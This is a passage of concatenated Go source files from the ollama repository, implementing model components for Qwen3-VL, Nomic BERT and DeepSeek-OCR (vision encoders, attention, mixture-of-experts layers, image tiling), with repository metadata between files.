Add(ctx, positionEmbedsChunks[3]) positionEmbeds = positionEmbeds.Reshape(ctx, -1, grid.Width/opts.spatialMergeSize, opts.spatialMergeSize, grid.Height/opts.spatialMergeSize) positionEmbeds = positionEmbeds.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx, n, -1) return hiddenStates.Add(ctx, positionEmbeds) } type VisionModel struct { PatchEmbedding *nn.Conv3D `gguf:"patch_embed"` PositionEmbedding *VisionPositionEmbedding Layers []VisionEncoderLayer `gguf:"blk"` PatchMerger *VisionPatchMerger `gguf:"merger"` DeepstackMerger []*VisionPatchMerger `gguf:"deepstack_merger"` VisionOptions } func (m *VisionModel) positions(ctx ml.Context, grid *Grid) (_, _ ml.Tensor) { indices := ctx.Input().FromInts(slices.Collect(func(yield func(int32) bool) { for y := range grid.Height { for x := range grid.Width { if !yield(int32(y)) { return } if !yield(int32(x)) { return } } } }), grid.Width*grid.Height*2) indices = indices.Reshape(ctx, -1, grid.Width/m.spatialMergeSize, m.spatialMergeSize, grid.Height/m.spatialMergeSize) indices = indices.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) indices = indices.Reshape(ctx, -1) halfDim := m.headDim() / 2 maxGrid := max(grid.Height, grid.Width) frequencies := ctx.Input().FromFloats(slices.Collect(func(yield func(float32) bool) { ropeTheta := float64(m.ropeTheta) for i := range maxGrid { for j := range halfDim / 2 { if !yield(float32(i) / float32(math.Pow(ropeTheta, float64(j*2)/float64(halfDim)))) { return } } } }), halfDim/2, maxGrid) embeds := frequencies.Rows(ctx, indices) embeds = embeds.Reshape(ctx, halfDim, 1, -1) embeds = embeds.Concat(ctx, embeds, 0) return embeds.Cos(ctx), embeds.Sin(ctx) } // Forward computes the vision model for an input tensor func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor, grid *Grid) (ml.Tensor, []ml.Tensor) { pixelValues = pixelValues.Reshape(ctx, m.patchSize, m.patchSize, m.temporalPatchSize, -1) hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.numChannels, m.patchSize, m.patchSize, 
m.temporalPatchSize, 0, 0, 0, 1, 1, 1) hiddenStates = m.PositionEmbedding.Forward(ctx, hiddenStates, grid, m.VisionOptions) cos, sin := m.positions(ctx, grid) deepstackStates := make([]ml.Tensor, len(m.deepstackVisualIndexes)) for i, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, cos, sin, m.VisionOptions) if i := slices.Index(m.deepstackVisualIndexes, int32(i)); i >= 0 { deepstackStates[i] = m.DeepstackMerger[i].Forward(ctx, hiddenStates, true, m.VisionOptions) } } hiddenStates = m.PatchMerger.Forward(ctx, hiddenStates, false, m.VisionOptions) return hiddenStates, deepstackStates } // newVisionModel creates a new instance of the Qwen vision model func newVisionModel(c fs.Config) *VisionModel { deepstackVisualIndexes := c.Ints("vision.deepstack_visual_indexes") model := &VisionModel{ Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count", 32)), DeepstackMerger: make([]*VisionPatchMerger, len(deepstackVisualIndexes)), VisionOptions: VisionOptions{ hiddenSize: int(c.Uint("vision.embedding_length", 1280)), numHeads: int(c.Uint("vision.attention.head_count", 16)), patchSize: int(c.Uint("vision.patch_size", 14)), numChannels: int(c.Uint("vision.num_channels", 3)), eps: c.Float("vision.attention.layer_norm_epsilon", 1e-6), ropeTheta: c.Float("vision.rope.freq_base", 10000.0), spatialMergeSize: int(c.Uint("vision.spatial_merge_size", 2)), temporalPatchSize: int(c.Uint("vision.temporal_patch_size", 2)), gridPerSide: int(math.Sqrt(float64(c.Uint("vision.num_positional_embeddings", 2304)))), mropeSections: slices.Collect(func(yield func(int) bool) { for _, section := range c.Ints("mrope_sections", []int32{24, 20, 20}) { if !yield(int(section)) { return } } }), deepstackVisualIndexes: deepstackVisualIndexes, }, } return model }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3vl/model_text.go
model/models/qwen3vl/model_text.go
package qwen3vl import ( "cmp" "math" "slices" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" ) type TextOptions struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength int eps, ropeBase, ropeScale float32 mropeSections []int numExperts, numExpertsUsed int normTopKProb bool } func (o TextOptions) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1/float32(math.Sqrt(float64(o.ropeScale))), rope.WithInterleaveMRoPE(o.mropeSections), ) } type TextAttention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *TextAttention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { batchSize := hiddenStates.Dim(1) query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) query = sa.QueryNorm.Forward(ctx, query, opts.eps) key = sa.KeyNorm.Forward(ctx, key, opts.eps) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return 
sa.Output.Forward(ctx, attention) } type TextMLP interface { Forward(ml.Context, ml.Tensor, *TextOptions) ml.Tensor } type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (mlp *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := mlp.Router.Forward(ctx, hiddenStates) routingWeights := routerLogits.Softmax(ctx) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, selectedExperts) if opts.normTopKProb { routingWeights = routingWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1)) routingWeights = routingWeights.Div(ctx, routingWeights.SumRows(ctx)) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1)) } hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = mlp.Gate.Forward(ctx, hiddenStates, selectedExperts).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates, selectedExperts)) experts := mlp.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *TextOptions) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, 
hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type TextLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` *TextAttention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` TextMLP } func (d *TextLayer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { residual := hiddenStates hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.TextAttention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.TextMLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Layers []TextLayer `gguf:"blk"` Options *TextOptions } var _ model.Model = (*Model)(nil) func newTextModel(c fs.Config) *TextModel { layers := make([]TextLayer, c.Uint("block_count")) for i := range layers { if strings.HasSuffix(c.String("general.architecture"), "moe") { layers[i].TextMLP = &sparse{} } else { layers[i].TextMLP = &dense{} } } m := TextModel{ Layers: layers, Options: &TextOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("norm_top_k_prob", true), mropeSections: 
slices.Collect(func(yield func(int) bool) { for _, section := range c.Ints("mrope_sections", []int32{24, 20, 20}) { if !yield(int(section)) { return } } }), }, } return &m }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/nomicbert/model.go
model/models/nomicbert/model.go
package nomicbert import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` TypeEmbedding *nn.Embedding `gguf:"token_types"` TokenEmbeddingNorm *nn.LayerNorm `gguf:"token_embd_norm"` Layers []EncoderLayer `gguf:"blk"` Options } type Options struct { hiddenSize int numHeads int headDim int eps float32 poolingType pooling.Type normalize bool ropeFreqBase float32 // MoE specific options (used by v2 / MoE models only) numExperts int numExpertsUsed int moeEveryNLayers int } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim, o.ropeFreqBase, 1.0, rope.WithTypeNeoX()) } type EncoderLayer struct { *Attention AttentionNorm *nn.LayerNorm `gguf:"attn_output_norm"` FeedForward FeedForward MLPNorm *nn.LayerNorm `gguf:"layer_output_norm"` } type Attention struct { QKV *nn.Linear `gguf:"attn_qkv"` Output *nn.Linear `gguf:"attn_output"` } type FeedForward interface { Forward(ml.Context, ml.Tensor, *Options) ml.Tensor } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *Options) ml.Tensor { hidden := mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hidden) } // denseGELU implements MLP with GELU activation for v2 MoE dense layers type denseGELU struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *denseGELU) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *Options) ml.Tensor { return mlp.Down.Forward(ctx, mlp.Up.Forward(ctx, hiddenStates).GELU(ctx)) 
} // sparse implements MoE with expert routing type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (moe *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := moe.Router.Forward(ctx, hiddenStates) routingWeights := routerLogits.Softmax(ctx) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, selectedExperts) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = moe.Up.Forward(ctx, hiddenStates, selectedExperts).GELU(ctx) experts := moe.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) typeEmbed := m.TypeEmbedding.Weight.Slice(ctx, 1, 0, 1, 1) hiddenStates = hiddenStates.Add(ctx, typeEmbed) hiddenStates = m.TokenEmbeddingNorm.Forward(ctx, hiddenStates, m.eps) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) for _, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, positions, &m.Options) } hiddenStates = m.poolingType.Forward(ctx, hiddenStates) if m.normalize { hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) } return hiddenStates, nil } func (e *EncoderLayer) Forward(ctx ml.Context, hiddenStates 
ml.Tensor, positions ml.Tensor, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = e.Attention.Forward(ctx, hiddenStates, positions, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) residual = hiddenStates hiddenStates = e.FeedForward.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.MLPNorm.Forward(ctx, hiddenStates, opts.eps) return hiddenStates } func (a *Attention) Forward(ctx ml.Context, hiddenStates ml.Tensor, positions ml.Tensor, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) qkv := a.QKV.Forward(ctx, hiddenStates) qkv = qkv.Reshape(ctx, opts.headDim, opts.numHeads*3, batchSize) chunks := qkv.Chunk(ctx, 1, opts.numHeads) query, key, value := chunks[0], chunks[1], chunks[2] query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(opts.headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return a.Output.Forward(ctx, attention) } func New(c fs.Config) (model.Model, error) { hiddenSize := int(c.Uint("embedding_length")) numHeads := int(c.Uint("attention.head_count")) headDim := hiddenSize / numHeads processor := model.NewWordPiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.cls_token_id"), c.Uint("tokenizer.ggml.bos_token_id"), )), }, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", true), EOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.separator_token_id"), c.Uint("tokenizer.ggml.eos_token_id"), )), }, }, false, ) blockCount := int(c.Uint("block_count")) moeEveryNLayers := int(c.Uint("moe_every_n_layers", 0)) layers := make([]EncoderLayer, 
blockCount) for i := range layers { if moeEveryNLayers > 0 { // Layer uses MoE if (i+1) % moe_every_n_layers == 0 if (i+1)%moeEveryNLayers == 0 { layers[i].FeedForward = &sparse{} } else { layers[i].FeedForward = &denseGELU{} } } else { layers[i].FeedForward = &dense{} } } return &Model{ TextProcessor: processor, Layers: layers, Options: Options{ hiddenSize: hiddenSize, numHeads: numHeads, headDim: headDim, eps: c.Float("attention.layer_norm_epsilon"), poolingType: pooling.Type(c.Uint("pooling_type")), normalize: c.Bool("normalize_embeddings", false), ropeFreqBase: c.Float("rope.freq_base", 1000.0), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), moeEveryNLayers: moeEveryNLayers, }, }, nil } func init() { model.Register("nomic-bert", New) model.Register("nomic-bert_embed", New) model.Register("nomic-bert-moe", New) model.Register("nomic-bert-moe_embed", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/imageprocessor.go
model/models/deepseekocr/imageprocessor.go
package deepseekocr import ( "bytes" "image" "image/color" "math" "slices" "golang.org/x/image/draw" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model/imageproc" ) type ratio struct { x, y int } func ProcessImage(ctx ml.Context, bts []byte) (ml.Tensor, ml.Tensor, []int, error) { img, _, err := image.Decode(bytes.NewReader(bts)) if err != nil { return nil, nil, nil, err } minNum, maxNum, imageSize, baseSize := 2, 9, 640, 1024 var targetRatios []ratio for n := minNum; n <= maxNum; n++ { for i := 1; i <= n; i++ { for j := 1; j <= n; j++ { if i*j <= maxNum && i*j >= minNum && !slices.Contains(targetRatios, ratio{i, j}) { targetRatios = append(targetRatios, ratio{i, j}) } } } } targetRatio := findBestAspectRatio(targetRatios, img.Bounds().Dx(), img.Bounds().Dy(), imageSize) targetWidth, targetHeight := imageSize*targetRatio.x, imageSize*targetRatio.y blocks := targetRatio.x * targetRatio.y mean := imageproc.ImageNetStandardMean std := imageproc.ImageNetStandardSTD var patches []float32 resized := imageproc.Resize(img, image.Point{X: targetWidth, Y: targetHeight}, imageproc.ResizeBilinear) for i := range blocks { patch := image.NewRGBA(image.Rect(0, 0, imageSize, imageSize)) draw.Draw(patch, patch.Bounds(), resized, image.Point{ X: i % (targetWidth / imageSize) * imageSize, Y: i / (targetWidth / imageSize) * imageSize, }, draw.Over) patches = append(patches, imageproc.Normalize(patch, mean, std, true, true)...) 
} img = imageproc.CompositeColor(img, color.Gray{}) img = imageproc.Pad(img, image.Point{X: baseSize, Y: baseSize}, color.Gray{127}, draw.BiLinear) return ctx.Input().FromFloats(patches, imageSize, imageSize, 3, blocks), ctx.Input().FromFloats(imageproc.Normalize(img, mean, std, true, true), baseSize, baseSize, 3), []int{targetRatio.x, targetRatio.y}, nil } func findBestAspectRatio(targetRatios []ratio, width, height, imageSize int) ratio { bestDiff := math.MaxFloat64 best := ratio{1, 1} realRatio := float64(width) / float64(height) for _, target := range targetRatios { targetRatio := float64(target.x) / float64(target.y) diff := math.Abs(realRatio - targetRatio) if diff < bestDiff { bestDiff = diff best = target } else if diff == bestDiff { if float64(width*height) > 0.5*float64(imageSize*imageSize*best.x*best.y) { best = target } } } return best }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model.go
model/models/deepseekocr/model.go
package deepseekocr import ( "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor Sam *samModel `gguf:"s"` Vision *visionModel `gguf:"v"` Text *textModel ImageNewline ml.Tensor `gguf:"mm.image_newline"` //nolint:misspell // this misspelling is upstream. fixing it breaks the model ViewSeperator ml.Tensor `gguf:"mm.view_seperator"` Projector *nn.Linear `gguf:"mm.layers"` } func (m *Model) EncodeMultimodal(ctx ml.Context, bts []byte) ([]input.Multimodal, error) { patches, original, crop, err := ProcessImage(ctx, bts) if err != nil { return nil, err } var outputs []ml.Tensor if true { // TODO: local features if sum(patches) != 0 samOutputs := m.Sam.Forward(ctx, patches) visionOutputs := m.Vision.Forward(ctx, patches, samOutputs) samOutputs = samOutputs.Reshape(ctx, -1, samOutputs.Dim(2), samOutputs.Dim(3)).Permute(ctx, 1, 0, 2, 3) visionOutputs = visionOutputs.Slice(ctx, 1, 1, visionOutputs.Dim(1), 1) localOutputs := visionOutputs.Concat(ctx, samOutputs, 0) localOutputs = m.Projector.Forward(ctx, localOutputs) hw := int(math.Sqrt(float64(localOutputs.Dim(1)))) localOutputs = localOutputs.Reshape(ctx, -1, hw, crop[0], crop[1]) localOutputs = localOutputs.Permute(ctx, 0, 2, 1, 3) localOutputs = localOutputs.Contiguous(ctx, -1, crop[0]*hw, crop[1]*hw) localOutputs = localOutputs.Concat(ctx, m.ImageNewline.Repeat(ctx, 2, localOutputs.Dim(2)), 1) localOutputs = localOutputs.Reshape(ctx, localOutputs.Dim(0), -1) outputs = append(outputs, localOutputs) } samOutputs := m.Sam.Forward(ctx, original) visionOutputs := m.Vision.Forward(ctx, original, samOutputs) samOutputs = samOutputs.Reshape(ctx, -1, samOutputs.Dim(2), samOutputs.Dim(3)).Permute(ctx, 1, 0, 2, 3) visionOutputs = visionOutputs.Slice(ctx, 1, 1, visionOutputs.Dim(1), 1) globalOutputs := 
visionOutputs.Concat(ctx, samOutputs, 0) globalOutputs = m.Projector.Forward(ctx, globalOutputs) hw := int(math.Sqrt(float64(globalOutputs.Dim(1)))) globalOutputs = globalOutputs.Reshape(ctx, -1, hw, hw) globalOutputs = globalOutputs.Concat(ctx, m.ImageNewline.Repeat(ctx, 2, globalOutputs.Dim(2)), 1) globalOutputs = globalOutputs.Reshape(ctx, globalOutputs.Dim(0), -1) outputs = append(outputs, globalOutputs, m.ViewSeperator) return []input.Multimodal{ {Tensor: outputs[0].Stack(ctx, 1, outputs[1:]...)}, }, nil } func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { outputs := make([]*input.Input, 0, len(inputs)) for i := range inputs { if inputs[i].Multimodal == nil { outputs = append(outputs, inputs[i]) continue } t := inputs[i].Multimodal[0].Tensor outputs = append(outputs, &input.Input{ Token: 128815, Multimodal: inputs[i].Multimodal, MultimodalHash: inputs[i].MultimodalHash, SameBatch: t.Dim(1) - 1, }) outputs = slices.Grow(outputs, t.Dim(1)-1) outputs = append(outputs, slices.Repeat([]*input.Input{{Token: 128815}}, t.Dim(1)-1)...) 
} return outputs, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { inputsEmbeds := m.Text.TokenEmbedding.Forward(ctx, batch.Inputs).Duplicate(ctx) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) for _, mm := range batch.Multimodal { t := mm.Multimodal[0].Tensor ctx.Forward(t.Copy(ctx, inputsEmbeds.View(ctx, mm.Index*inputsEmbeds.Stride(1), t.Dim(0)*t.Dim(1)))) } hiddenStates := inputsEmbeds for i, block := range m.Text.Blocks { if m.Cache != nil { m.Cache.SetLayer(i) } var outputs ml.Tensor if i == len(m.Text.Blocks)-1 { outputs = batch.Outputs } hiddenStates = block.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Text.Options) } hiddenStates = m.Text.OutputNorm.Forward(ctx, hiddenStates, m.Text.Options.eps) return m.Text.Output.Forward(ctx, hiddenStates), nil } func init() { model.Register("deepseekocr", func(c fs.Config) (model.Model, error) { textBlocks := make([]textBlock, c.Uint("block_count")) leadingDenseBlockCount := int(c.Uint("leading_dense_block_count", 1)) for i := range textBlocks { if i >= leadingDenseBlockCount { textBlocks[i].FeedForward = &textMoe{} } else { textBlocks[i].FeedForward = &textMLP{} } } m := Model{ TextProcessor: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, // Split regex into multiple parts (according to DeepSeek3's regex) "\\p{N}{1,3}", `[一-龥぀-ゟ゠-ヿ]+`, "[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+", ), Text: &textModel{ Blocks: textBlocks, Options: 
textOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), ropeBase: c.Float("rope.freq_base", 10_000), ropeScale: c.Float("rope.scaling.factor", 1.0), eps: c.Float("attention.layer_norm_rms_epsilon", 1e-6), }, }, Vision: &visionModel{ Blocks: make([]visionBlock, c.Uint("vision.block_count")), Options: visionOptions{ hiddenSize: int(c.Uint("vision.embedding_length")), numHeads: int(c.Uint("vision.head_count")), imageSize: int(c.Uint("vision.image_size", 224)), patchSize: int(c.Uint("vision.patch_size", 14)), eps: c.Float("vision.attention.layer_norm_epsilon", 1e-5), }, }, Sam: &samModel{ Blocks: make([]samBlock, c.Uint("sam.block_count")), Options: samOptions{ hiddenSize: int(c.Uint("sam.embedding_length")), numHeads: int(c.Uint("sam.head_count")), eps: c.Float("sam.attention.layer_norm_epsilon", 1e-6), globalAttentionLayers: c.Ints("sam.global_attention_indexes"), }, }, } m.Cache = kvcache.NewCausalCache(m.Text.Shift) return &m, nil }) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model_vision.go
model/models/deepseekocr/model_vision.go
package deepseekocr import ( "math" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type visionModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_embd"` ClassEmbedding ml.Tensor `gguf:"class_embd"` PositionEmbedding *nn.Embedding `gguf:"position_embd"` PreLayerNorm *nn.LayerNorm `gguf:"pre_layrnorm"` Blocks []visionBlock `gguf:"blk"` Options visionOptions } func (m *visionModel) absolutePositionEmbedding(ctx ml.Context, embeds ml.Tensor) ml.Tensor { numPatches := m.Options.imageSize / m.Options.patchSize * m.Options.imageSize / m.Options.patchSize positions := ctx.Arange(0, float32(numPatches+1), 1, ml.DTypeI32) positionEmbeds := m.PositionEmbedding.Forward(ctx, positions) source := int(math.Sqrt(float64(positionEmbeds.Dim(1) - 1))) target := int(math.Sqrt(float64(embeds.Dim(1) - 1))) if source != target { newPositionEmbeds := positionEmbeds.Slice(ctx, 1, 1, positionEmbeds.Dim(1), 1) newPositionEmbeds = newPositionEmbeds.Reshape(ctx, -1, source, source) newPositionEmbeds = newPositionEmbeds.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) newPositionEmbeds = newPositionEmbeds.Interpolate(ctx, [4]int{target, target, embeds.Dim(0), 1}, ml.SamplingModeBilinear) newPositionEmbeds = newPositionEmbeds.Permute(ctx, 1, 2, 0, 3) newPositionEmbeds = newPositionEmbeds.Contiguous(ctx, -1, target*target) positionEmbeds = positionEmbeds.Slice(ctx, 1, 0, 1, 1).Concat(ctx, newPositionEmbeds, 1) } return positionEmbeds } func (m *visionModel) Forward(ctx ml.Context, pixelValues, patchEmbeds ml.Tensor) ml.Tensor { if patchEmbeds == nil { patchEmbeds = m.PatchEmbedding.Forward(ctx, pixelValues, m.Options.patchSize, m.Options.patchSize, 0, 0, 1, 1) } patchEmbeds = patchEmbeds.Reshape(ctx, -1, patchEmbeds.Dim(2), patchEmbeds.Dim(3)) patchEmbeds = patchEmbeds.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) classEmbeds := m.ClassEmbedding.Repeat(ctx, 2, patchEmbeds.Dim(2)) embeds := classEmbeds.Concat(ctx, patchEmbeds, 1) embeds = embeds.Add(ctx, m.absolutePositionEmbedding(ctx, 
